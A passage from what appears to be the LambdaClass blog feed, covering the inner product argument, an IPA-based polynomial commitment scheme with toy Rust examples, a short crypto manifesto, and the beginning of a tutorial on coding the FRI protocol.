&lt;p&gt;Let $n = 2^k$ and suppose $k&amp;gt;1$. Otherwise, we follow the case $n=2$ described above.&lt;br &#x2F;&gt;
Write $A = (a_1,\dots, a_{2^k})$ and define the lower and higher parts of $A$ as $A_{lo} := (a_1,\dots,a_{2^{k-1}})$ and $A_{hi} := (a_{2^{k-1}+1}, \dots, a_{2^k})$. The same for $B$, $B_{lo}$ and $B_{hi}$, $G_{lo}$, $G_{hi}$, $H_{lo}$, $H_{hi}$.&lt;&#x2F;p&gt;
&lt;p&gt;The protocol also starts with the verifier choosing a random element $U$ in $\mathbb{G}$ and sending it to the prover. This happens only at the very first round; the same element $U$ is then used throughout all rounds.&lt;&#x2F;p&gt;
&lt;p&gt;The prover computes the following elements and sends them to the verifier&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$L := \langle A_{lo}, G_{hi} \rangle + \langle B_{hi}, H_{lo} \rangle + \langle A_{lo}, B_{hi}\rangle U$, and&lt;&#x2F;li&gt;
&lt;li&gt;$R := \langle A_{hi}, G_{lo} \rangle + \langle B_{lo}, H_{hi} \rangle + \langle A_{hi}, B_{lo}\rangle U$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;The verifier chooses a random non-zero value $x\in\mathbb{F}$ and sends it to the prover.&lt;&#x2F;p&gt;
&lt;p&gt;At this point, the next step starts. The prover computes&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$A’ := x A_{lo} + x^{-1} A_{hi}$,&lt;&#x2F;li&gt;
&lt;li&gt;$B’ := x^{-1} B_{lo} + x B_{hi}$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;These will take the roles of $A$ and $B$. The bases are updated similarly to $A$ and $B$. Meaning, in the next step, instead of $G$ and $H$, the following bases are used:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$G’ := x^{-1} G_{lo} + x G_{hi}$.&lt;&#x2F;li&gt;
&lt;li&gt;$H’ := x H_{lo} + x^{-1} H_{hi}$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Finally, the verifier accepts if and only if the check at the last step ($n$=2) succeeds.&lt;&#x2F;p&gt;
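&lt;p&gt;A useful way to convince yourself that the halving step makes sense is to check the invariant it preserves: writing the “full” commitment as $\langle A, G\rangle + \langle B, H\rangle + \langle A, B\rangle U$, after one round the folded instance $(A’, B’, G’, H’)$ has full commitment equal to $x^2 L + (\text{old full commitment}) + x^{-2} R$, a quantity the verifier can reconstruct. The sketch below implements one round in the same toy setting as before (the additive group modulo a small prime stands in for $\mathbb{G}$; insecure, made-up values).&lt;&#x2F;p&gt;

```rust
// One halving round of the Open protocol over a toy group (Z_p under
// addition stands in for G; insecure, illustration only).
const PRIME: u64 = 101;

fn m(a: u64, b: u64) -> u64 { a * b % PRIME }

/// Multiplicative inverse mod PRIME (Fermat's little theorem; PRIME is prime).
fn inv(x: u64) -> u64 {
    let (mut base, mut e, mut acc) = (x % PRIME, PRIME - 2, 1);
    while e > 0 {
        if e & 1 == 1 { acc = m(acc, base); }
        base = m(base, base);
        e >>= 1;
    }
    acc
}

/// <A, G> (or an inner product <A, B>): sum of a_i * g_i mod PRIME.
fn msm(a: &[u64], g: &[u64]) -> u64 {
    a.iter().zip(g).fold(0, |acc, (x, y)| (acc + x * y) % PRIME)
}

/// c * lo + c^{-1} * hi, componentwise: the folding applied to A, B, G, H.
fn fold(c: u64, lo: &[u64], hi: &[u64]) -> Vec<u64> {
    lo.iter().zip(hi).map(|(l, h)| (m(c, *l) + m(inv(c), *h)) % PRIME).collect()
}

/// The "full" commitment <A, G> + <B, H> + <A, B> U.
pub fn full_commit(a: &[u64], b: &[u64], g: &[u64], h: &[u64], u: u64) -> u64 {
    (msm(a, g) + msm(b, h) + m(msm(a, b), u)) % PRIME
}

/// One round: computes (L, R) and the folded (A', B', G', H').
pub fn round(a: &[u64], b: &[u64], g: &[u64], h: &[u64], u: u64, x: u64)
    -> (u64, u64, Vec<u64>, Vec<u64>, Vec<u64>, Vec<u64>) {
    let n = a.len() / 2;
    let (alo, ahi) = a.split_at(n);
    let (blo, bhi) = b.split_at(n);
    let (glo, ghi) = g.split_at(n);
    let (hlo, hhi) = h.split_at(n);
    let l = (msm(alo, ghi) + msm(bhi, hlo) + m(msm(alo, bhi), u)) % PRIME;
    let r = (msm(ahi, glo) + msm(blo, hhi) + m(msm(ahi, blo), u)) % PRIME;
    (l, r,
     fold(x, alo, ahi),      // A' = x A_lo + x^{-1} A_hi
     fold(inv(x), blo, bhi), // B' = x^{-1} B_lo + x B_hi
     fold(inv(x), glo, ghi), // G' = x^{-1} G_lo + x G_hi
     fold(x, hlo, hhi))      // H' = x H_lo + x^{-1} H_hi
}
```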
&lt;h1 id=&quot;polynomial-commitment-scheme&quot;&gt;Polynomial commitment scheme&lt;&#x2F;h1&gt;
&lt;p&gt;There is a polynomial commitment scheme inspired by the IPA protocol. This is used in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;zcash.github.io&#x2F;halo2&#x2F;index.html&quot;&gt;Halo2&lt;&#x2F;a&gt; proving system.&lt;&#x2F;p&gt;
&lt;p&gt;A polynomial commitment scheme has two parts:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Commit&lt;&#x2F;strong&gt; : given a polynomial $p$, the prover produces an object that’s unique to $p$. We denote it here by $[p]$ and call it the &lt;em&gt;commitment&lt;&#x2F;em&gt; of $p$. The prover usually sends $[p]$ to the verifier. The object $[p]$ is a sort of hash of $p$.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Open&lt;&#x2F;strong&gt; : an interactive protocol between the prover and the verifier. The verifier only holds the commitment $[p]$ of some polynomial and sends the prover a value $z$ at which he wants to know $p(z)$. The prover responds with a value $c$, and then they engage in the &lt;em&gt;Open&lt;&#x2F;em&gt; protocol. As a result, the verifier gets convinced that the polynomial corresponding to the commitment $[p]$ evaluates to $c$ at $z$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;The idea to build a polynomial commitment scheme out of IPA is primarily based on two observations.&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;A polynomial $p = \sum_{i=0}^{n-1} a_i X^i$ is uniquely determined by the vector of its coefficients $A = (a_0, \dots, a_{n-1})$.&lt;&#x2F;li&gt;
&lt;li&gt;The evaluation of $p$ at an element $z$ is precisely the inner product between the vector $A$ of coefficients of $p$ and the vector $B$ of powers of $z$. More precisely, if $p = \sum_{i=0}^{n-1} a_i X^i$, then&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;$$ p(z) = \langle A, B\rangle,$$&lt;br &#x2F;&gt;
where $A = (a_0, \dots, a_{n-1})$ and $B = (1, z, z^2, \dots, z^{n-1})$.&lt;&#x2F;p&gt;
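&lt;p&gt;The second observation is easy to check by computing the same value both ways. A minimal sketch over a toy prime field (made-up modulus and values):&lt;&#x2F;p&gt;

```rust
// Evaluating p at z equals the inner product of the coefficient vector
// with the vector of powers (1, z, z^2, ...). Toy prime field mod 101.
const PRIME: u64 = 101;

/// Horner evaluation of p = a_0 + a_1 X + ... + a_{n-1} X^{n-1} at z.
pub fn eval(coeffs: &[u64], z: u64) -> u64 {
    coeffs.iter().rev().fold(0, |acc, a| (acc * z + a) % PRIME)
}

/// <A, B> with A the coefficients and B = (1, z, ..., z^{n-1}).
pub fn inner_product_eval(coeffs: &[u64], z: u64) -> u64 {
    let mut power = 1; // z^i, starting at z^0
    let mut acc = 0;
    for a in coeffs {
        acc = (acc + a * power) % PRIME;
        power = power * z % PRIME;
    }
    acc
}
```

&lt;p&gt;For instance, with coefficients $(3, 1, 4, 1)$ and $z = 5$, both computations give $3 + 5 + 100 + 125 \bmod 101 = 31$.&lt;&#x2F;p&gt;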
&lt;p&gt;As we’ll see shortly, the commitment of the polynomial $p$ is very similar to the commitment $P$ of $(A, B)$ in IPA. The open protocol is very similar too. And it proves that a value $c$ is actually $c = \langle A, B\rangle$, which is $p(z)$ by the way $B$ is defined.&lt;br &#x2F;&gt;
A major difference with IPA is that, in this case, the vector $B$ is always known to the verifier. So the terms that correspond to $B$ in the commitment are unnecessary. This makes the sequence $H_1,\dots, H_n$ unnecessary too. Instead of completely removing those terms, a random value is added by the prover, but with another purpose. It is called the &lt;em&gt;blinding factor&lt;&#x2F;em&gt; and it’s there to add zero knowledge to the protocols.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;setup-1&quot;&gt;Setup&lt;&#x2F;h3&gt;
&lt;p&gt;As with IPA, there is a setup phase where the needed ingredients are produced:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;A commutative group $\mathbb{G}$ with $p$ elements. As before, we’ll use additive notation.&lt;&#x2F;li&gt;
&lt;li&gt;A sequence of elements $G_0,\dots, G_{n-1} \in \mathbb{G}$ and a single element $H\in\mathbb{G}$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;commit-1&quot;&gt;Commit&lt;&#x2F;h3&gt;
&lt;p&gt;Given a polynomial $p = \sum_{i=0}^{n-1} a_i X^i$, to produce the commitment $[p]$ of it, the prover chooses a random value $r\in\mathbb{F}$ and computes&lt;&#x2F;p&gt;
&lt;p&gt;$$[p] := a_0G_0 + \cdots + a_{n-1}G_{n-1} + rH.$$&lt;&#x2F;p&gt;
&lt;p&gt;The value $r$ is called the &lt;em&gt;blinding factor&lt;&#x2F;em&gt;. The prover always keeps track of which values $r$ were used for each of the produced commitments $[p]$. This is because he’ll need them later on for the Open protocol. Formally, what we described is a commitment to the pair $(p, r)$ and we should write it as $[(p,r)]$. But to ease notation we drop the explicit mention to the blinding factor $r$.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;open-1&quot;&gt;Open&lt;&#x2F;h3&gt;
&lt;p&gt;Recall we are assuming here that the verifier already holds a commitment $[p]$ to a polynomial $p$ known to the prover. The prover also knows the value $r$ he used to produce the commitment $[p]$. The verifier has already sent an element $z$ in $\mathbb{F}$ at which he wants to know the value $p(z)$, and the prover responded with a purported value $c$. What follows is the Open protocol in which they engage to convince the verifier that $c = p(z)$.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;case-n-2-1&quot;&gt;Case $n=2$&lt;&#x2F;h4&gt;
&lt;p&gt;Let’s begin with the base case. As with IPA, this is the case to which all the others reduce.&lt;&#x2F;p&gt;
&lt;p&gt;When $n=2$, the polynomial $p$ is of degree at most $1$, that is, $p=a_0 + a_1 X$. Let $A=(a_0, a_1)$ and $B=(1, z)$. Define $b_0 = 1$ and $b_1=z$.&lt;&#x2F;p&gt;
&lt;p&gt;The interaction starts with the verifier choosing a random element $U$ in $\mathbb{G}$ and sending it to the prover.&lt;&#x2F;p&gt;
&lt;p&gt;The prover chooses random values $s, s’ \in \mathbb{F}$ and responds to the verifier with the following elements&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$L := a_0G_1 + sH + a_0b_1U$ and&lt;&#x2F;li&gt;
&lt;li&gt;$R := a_1G_0 + s’H + a_1b_0U$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;The verifier chooses a random non-zero value $x\in\mathbb{F}$ and sends it to the prover, who uses it to compute the following elements.&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$a’ := a_0 x + a_1 x^{-1}$&lt;&#x2F;li&gt;
&lt;li&gt;$b’ := b_0 x^{-1} + b_1 x$&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;The prover sends $a’$ and $b’$ to the verifier along with the element $r’ := sx^2 + r + s’x^{-2}$. Finally, the verifier checks that:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\begin{equation}&lt;br &#x2F;&gt;
x^2 L + [p] + x^{-2} R + c U = x^{-1} a’ G_0 + xa’ G_1 + r’ H + a’b’U&lt;br &#x2F;&gt;
\end{equation}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;The verifier accepts if and only if the above equality holds.&lt;&#x2F;p&gt;
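&lt;p&gt;Again we can exercise the check numerically, this time tracking the blinding factors. The sketch below runs one honest $n=2$ opening in the same toy setting (additive group modulo a small prime in place of $\mathbb{G}$; insecure, all concrete values made up) and computes both sides of the verifier’s equation.&lt;&#x2F;p&gt;

```rust
// Toy n = 2 opening for the IPA-based polynomial commitment, including
// the blinding-factor bookkeeping. Insecure; illustration only.
const PRIME: u64 = 101;

fn m(a: u64, b: u64) -> u64 { a * b % PRIME }

/// Multiplicative inverse mod PRIME (Fermat's little theorem; PRIME is prime).
fn inv(x: u64) -> u64 {
    let (mut base, mut e, mut acc) = (x % PRIME, PRIME - 2, 1);
    while e > 0 {
        if e & 1 == 1 { acc = m(acc, base); }
        base = m(base, base);
        e >>= 1;
    }
    acc
}

/// Honest prover data for p = a0 + a1 X opened at z; returns (lhs, rhs) of
/// x^2 L + [p] + x^{-2} R + cU = x^{-1}a'G_0 + x a'G_1 + r'H + a'b'U.
pub fn open_check(a: [u64; 2], z: u64, g: [u64; 2], hg: u64,
                  r: u64, s: u64, s2: u64, u: u64, x: u64) -> (u64, u64) {
    let b = [1, z]; // powers of z, known to the verifier
    let p_comm = (m(a[0], g[0]) + m(a[1], g[1]) + m(r, hg)) % PRIME; // [p]
    let c = (a[0] + m(a[1], z)) % PRIME;                             // p(z)
    let l = (m(a[0], g[1]) + m(s, hg) + m(m(a[0], b[1]), u)) % PRIME;
    let rr = (m(a[1], g[0]) + m(s2, hg) + m(m(a[1], b[0]), u)) % PRIME;
    let xi = inv(x);
    let (x2, xi2) = (m(x, x), m(xi, xi));
    let a_p = (m(a[0], x) + m(a[1], xi)) % PRIME;
    let b_p = (m(b[0], xi) + m(b[1], x)) % PRIME;
    let r_p = (m(s, x2) + r + m(s2, xi2)) % PRIME; // r' = s x^2 + r + s' x^{-2}
    let lhs = (m(x2, l) + p_comm + m(xi2, rr) + m(c, u)) % PRIME;
    let rhs = (m(xi, m(a_p, g[0])) + m(x, m(a_p, g[1])) + m(r_p, hg) + m(m(a_p, b_p), u)) % PRIME;
    (lhs, rhs)
}
```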
&lt;h4 id=&quot;general-case-n-2-k&quot;&gt;General case $n=2^k$&lt;&#x2F;h4&gt;
&lt;p&gt;The idea is the same as in IPA. It is a recursive argument.&lt;&#x2F;p&gt;
&lt;p&gt;Let $n = 2^k$ and suppose $k&amp;gt;1$. If $k=1$, we follow the case $n=2$ described above.&lt;br &#x2F;&gt;
Write $p = \sum_{i=0}^{n-1}a_iX^i$. As before, define $A = (a_0,\dots, a_{2^k-1})$ and $B=(1, z, \dots, z^{n-1})$. Let the lower and higher parts of $A$ be the first and second halves of it. The same for the rest of the vectors involved.&lt;&#x2F;p&gt;
&lt;p&gt;The protocol starts, as before, with the verifier choosing a random element $U$ in $\mathbb{G}$ and sending it to the prover.&lt;&#x2F;p&gt;
&lt;p&gt;The prover chooses random elements $s, s’$ in $\mathbb{F}$. He computes the following elements and sends them to the verifier&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$L := \langle A_{lo}, G_{hi} \rangle + sH + \langle A_{lo}, B_{hi}\rangle U$, and&lt;&#x2F;li&gt;
&lt;li&gt;$R := \langle A_{hi}, G_{lo} \rangle + s’H + \langle A_{hi}, B_{lo}\rangle U$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;The verifier chooses a random non-zero value $x\in\mathbb{F}$ and sends it to the prover.&lt;&#x2F;p&gt;
&lt;p&gt;At this point, the next step starts. The prover computes&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$A’ := x A_{lo} + x^{-1} A_{hi}$,&lt;&#x2F;li&gt;
&lt;li&gt;$B’ := x^{-1} B_{lo} + x B_{hi}$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;These will take the roles of $A$ and $B$. The following basis is used in the next round instead of $G$:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$G’ := x^{-1} G_{lo} + x G_{hi}$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;The verifier accepts if and only if the check at the last step ($n$=2) succeeds.&lt;&#x2F;p&gt;
&lt;h1 id=&quot;to-be-continued&quot;&gt;To be continued&lt;&#x2F;h1&gt;
&lt;p&gt;In a follow-up blogpost we’ll discuss the complexity of these protocols and we’ll see how they can be optimized and used in recursive arguments of knowledge.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Lambda Crypto Doctrine</title>
          <pubDate>Wed, 23 Aug 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/lambda-crypto-doctrine/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/lambda-crypto-doctrine/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/lambda-crypto-doctrine/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;2023&#x2F;08&#x2F;image-1.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;We believe crypto has been incredibly successful at providing a trustless financial layer for the 21st century. In particular it has found product market fit in two main areas:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;In developing countries, providing tools to individuals who need to fight inflation and censorship, and enabling companies and individuals to do business.&lt;&#x2F;li&gt;
&lt;li&gt;Internet-native communities that need a financial layer on the web that allows them to express themselves and coordinate at a scale that wasn’t possible before. They have created new financial assets and markets that seem absurd from the outside. Many times they are also absurd from the inside.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;People who don’t live in a developing country or who didn’t grow up with the internet have enormous difficulty understanding crypto because they don’t have skin in its game. They believe crypto doesn’t have any “real” use case or that it is not serious enough. They are right. The thing is that we are living in a world that is becoming more absurd. Memes don’t just make you laugh anymore; memes are now winning elections.&lt;&#x2F;p&gt;
&lt;p&gt;We’re sure that these two use cases will grow with time, and new ones will probably be found. The world is becoming more chaotic and more divided each day. The stability that existed between the fall of the Soviet Union and the beginning of the pandemic appears to have become a thing of the past. Change will become the norm. And we love it.&lt;&#x2F;p&gt;
&lt;p&gt;This will make crypto even bigger. One of its prime advantages is that it removes many middlemen and allows us to coordinate even in the harshest environments. Trust assumptions are lowered thanks to economic incentives, compilers, distributed systems, and cryptography. Crypto lowers the reliance on human beings, and this empowers humans: it allows them to concentrate their disputes and efforts on subjective areas. Crypto creates safe zones where some parts of human activity become non-debatable (until quantum computers solve the discrete log problem).&lt;&#x2F;p&gt;
&lt;p&gt;Most of us are internet natives. We have been using irc, 4chan, reddit, hacker news, twitter, Bitcoin and Ethereum since their beginning and our organization has deep roots in unstable countries. In our roots we have a strange mix of knowing what it is to live in very chaotic societies and how to develop businesses within them and at the same time we are builders that love working in the frontier of engineering and scientific developments. We are the Fremen of crypto, raised in a harsh environment.&lt;&#x2F;p&gt;
&lt;p&gt;Open source and decentralization are not only philosophical ideas but necessary practical conditions to build crypto. Building in the open, helping onboard others and creating movements bigger than the original project are crucial for crypto projects to succeed long term. Sometimes it’s difficult for us to explain our actions to others that don’t follow the same ethos since we are not maximizing the same outcomes.&lt;&#x2F;p&gt;
&lt;p&gt;Our main objective is to help these new internet highways be built in sustainable ways. Economic sustainability is one key aspect, but there are others. We are a force that builds large technological projects but that also counterweights the natural tendency to centralize as a side effect of optimization. Centralization is easier and cheaper in the short run. If we wanted to optimize for money, there are easier ways to do it. The thing is, that is not our main objective. We only see money as a tool to achieve our objectives.&lt;&#x2F;p&gt;
&lt;p&gt;With or without money you will find us building. You are invited to join us in our journey.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;em&gt;“Top-down management leveraging command-and-control hierarchies are for the mahogany boardrooms of yesteryear. We are navigators, adventurers, and explorers of the future. We are married to the sea” - Yearn’s Blue Pill&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>How to code FRI from scratch</title>
          <pubDate>Fri, 18 Aug 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-code-fri-from-scratch/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-code-fri-from-scratch/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-code-fri-from-scratch/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2018&#x2F;046.pdf&quot;&gt;STARKs&lt;&#x2F;a&gt; (scalable transparent arguments of knowledge) have gained a lot of attention in recent years due to their capacity to help scale Ethereum and other L1s. They provide a way to guarantee the integrity of a computation carried out by an untrusted party via cryptographic proof. This proof can be verified much faster than the trivial check of the computation, that is, rerunning the whole computation by other parties. The key idea is that the whole computation can be expressed as a table of values and a set of polynomial constraints they must satisfy. This set of constraints can be converted into a random linear combination of quotients of polynomials of the form (we will not go into the details of this transformation. For an intro, see &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;starkware-industries&#x2F;stark101&quot;&gt;Stark-101&lt;&#x2F;a&gt; or &lt;a href=&quot;&#x2F;diving-deep-fri&#x2F;&quot;&gt;our blog&lt;&#x2F;a&gt;)&lt;br &#x2F;&gt;
$$p_0 (x) = \sum_k \alpha_k \frac{c_k (x)}{z_k (x)}$$&lt;br &#x2F;&gt;
where $c_k (x)$ and $z_k (x)$ are polynomials. The computation is valid if $p_0 (x)$ is a polynomial (if not, it will be a rational function), which happens if each $c_k (x)$ is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Polynomial_long_division&quot;&gt;divisible&lt;&#x2F;a&gt; by its corresponding $z_k (x)$. How can we convince a verifier quickly that the previous $p_0 (x)$ is a polynomial? The key ingredient is the FRI protocol, which we will cover in the following sections. The code presented is taken from the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks_stark_platinum&#x2F;tree&#x2F;main&quot;&gt;Stark Platinum Prover&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;If you want to learn more about the FRI protocol and its properties, we recommend you read &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2018&#x2F;046.pdf&quot;&gt;the original STARKs paper&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;1216.pdf&quot;&gt;A summary on the FRI low degree test&lt;&#x2F;a&gt;. We want to thank Eli Ben-Sasson and the amazing Starkware team for helping us learn the protocol and in developing the prover.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;the-idea-behind-fri&quot;&gt;The idea behind FRI&lt;&#x2F;h2&gt;
&lt;p&gt;FRI stands for Fast Reed-Solomon Interactive Oracle Proof of Proximity. It allows us to prove that the evaluations of a given function $p$ over a domain $D_0$ correspond to the evaluations of a low-degree polynomial (with respect to the size of $D_0$). Why is this useful?&lt;&#x2F;p&gt;
&lt;p&gt;Suppose we want to convince someone that we have some polynomial, $p_0$ of degree $N$. We could pass all the values of the $N+1$ coefficients or $N+1$ evaluations of the polynomial over some set. The problem is that we must pass $N+1$ numbers (in STARKs, the degree $N$ can be large), and the proof and verification will not be short. We could do better by reducing the degree of the polynomial by some suitable transformation. We can split the polynomial into the odd and even degree powers (we will suppose that $N$ is odd, but this doesn’t matter),&lt;br &#x2F;&gt;
$p_0 (x) = p_{0,e} ( x^2 ) + x p_{0,o} (x^2 )$&lt;br &#x2F;&gt;
where&lt;br &#x2F;&gt;
$p_{0,e} ( x^2 ) = a_0 + a_2 x^2 + a_4 x^4 + … + a_{N-1} x^{N-1}$&lt;br &#x2F;&gt;
and&lt;br &#x2F;&gt;
$p_{0,o} ( x^2 ) = a_1 + a_3 x^2 + a_5 x^4 + … + a_N x^{N-1}$&lt;br &#x2F;&gt;
we can randomly fold the two parts by sampling a random $\beta_0$ and creating a polynomial of degree $(N - 1) &#x2F; 2$,&lt;br &#x2F;&gt;
$p_1 (y) = (a_0 + \beta_0 a_1 ) + (a_2 + \beta_0 a_3 ) y + … + (a_{N-1} + \beta_0 a_N ) y^{(N - 1)&#x2F;2}$&lt;br &#x2F;&gt;
We could show that we have a polynomial by passing all the $(N + 1)&#x2F;2$ coefficients of $p_1 (y)$, together with some evaluations of $p_0 (x)$, to show that we correctly deduced $p_1 (y)$ from $p_0 (x)$.&lt;&#x2F;p&gt;
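&lt;p&gt;As a toy illustration of a single folding step (plain integers instead of field elements, with made-up coefficients and a made-up $\beta_0$), the map from $p_0$ to $p_1$ is just a pairwise combination of coefficients:&lt;&#x2F;p&gt;

```rust
// One FRI-style folding step on toy integer coefficients (no field arithmetic).
// p0(x) = a0 + a1 x + a2 x^2 + a3 x^3 folds to p1(y) = (a0 + b*a1) + (a2 + b*a3) y.
fn fold4(c: [i64; 4], beta: i64) -> [i64; 2] {
    [c[0] + beta * c[1], c[2] + beta * c[3]]
}

fn main() {
    // p0(x) = 1 + 2x + 3x^2 + 4x^3 with beta = 5 (hypothetical toy values)
    let p1 = fold4([1, 2, 3, 4], 5);
    assert_eq!(p1, [11, 23]); // p1(y) = 11 + 23y: degree dropped from 3 to 1
}
```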
&lt;p&gt;Of course, why would we stop with $(N + 1)&#x2F;2$ coefficients when we could further reduce the number of coefficients by repeating the same strategy?&lt;br &#x2F;&gt;
$p_1 (y) = p_{1,e} ( y^2 ) + y p_{1,o} (y^2 )$&lt;br &#x2F;&gt;
where&lt;br &#x2F;&gt;
$p_{1,e} ( y^2 ) = b_0 + b_2 y^2 + b_4 y^4 + … + b_{M-1} y^{M-1}$&lt;br &#x2F;&gt;
and&lt;br &#x2F;&gt;
$p_{1,o} ( y^2 ) = b_1 + b_3 y^2 + b_5 y^4 + … + b_M y^{M-1}$&lt;br &#x2F;&gt;
Then, we sample randomly $\beta_1$ and fold&lt;br &#x2F;&gt;
$p_2 (z) = (b_0 + \beta_1 b_1 ) + (b_2 + \beta_1 b_3 ) z + … + (b_{M-1} + \beta_1 b_M ) z^{(M - 1)&#x2F;2}$&lt;br &#x2F;&gt;
We can repeat this, reducing the degree of the polynomial by half at each step. After roughly $\log_2 (N)$ steps, we arrive at a constant polynomial and only need to pass that single value. A verifier could be convinced that we were given a polynomial by following these foldings down to the final constant value.&lt;&#x2F;p&gt;
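&lt;p&gt;Repeating the folding, the coefficient vector shrinks by half each time until a single constant remains. A minimal sketch with made-up coefficients and challenges:&lt;&#x2F;p&gt;

```rust
// Folding a degree-3 toy polynomial twice down to a constant (plain integers,
// with hypothetical betas 5 and 7 standing in for the random challenges).
fn main() {
    let p0 = vec![1i64, 2, 3, 4]; // p0(x) = 1 + 2x + 3x^2 + 4x^3
    let p1 = vec![p0[0] + 5 * p0[1], p0[2] + 5 * p0[3]]; // degree 1
    let p2 = vec![p1[0] + 7 * p1[1]]; // degree 0: the final constant
    assert_eq!(p2, vec![172]); // only this single value must be sent
}
```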
&lt;p&gt;Below we give the Rust code used in Lambdaworks to fold a polynomial:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn fold_polynomial&amp;lt;F&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    poly: &amp;amp;Polynomial&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    beta: &amp;amp;FieldElement&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; Polynomial&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;where&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    F: IsField,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let coef = poly.coefficients();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let even_coef: Vec&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt; = coef.iter().step_by(2).cloned().collect();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; odd coefficients of poly are multiplied by beta&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
